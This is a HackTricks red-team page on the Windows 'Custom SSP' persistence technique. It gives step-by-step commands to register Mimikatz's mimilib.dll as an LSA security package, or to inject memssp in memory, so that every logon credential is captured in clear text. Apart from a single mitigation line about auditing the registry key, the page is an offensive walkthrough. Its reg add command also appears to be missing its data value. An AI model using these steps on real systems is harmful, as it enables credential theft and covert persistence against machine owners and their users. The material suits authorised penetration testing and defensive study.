3.6 KiB
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Custom SSP
Learn what is a SSP (Security Support Provider) here.
You can create you own SSP to capture in clear text the credentials used to access the machine.
Mimilib
You can use the mimilib.dll
binary provided by Mimikatz. This will log inside a file all the credentials in clear text.
Drop the dll in C:\Windows\System32\
Get a list existing LSA Security Packages:
{% code title="attacker@target" %}
PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages REG_MULTI_SZ kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
{% endcode %}
Add mimilib.dll
to the Security Support Provider list (Security Packages):
reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"
And after a reboot all credentials can be found in clear text in C:\Windows\System32\kiwissp.log
In memory
You can also inject this in memory directly using Mimikatz (notice that it could be a little bit unstable/not working):
privilege::debug
misc::memssp
This won't survive reboots.
Mitigation
Event ID 4657 - Audit creation/change of HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.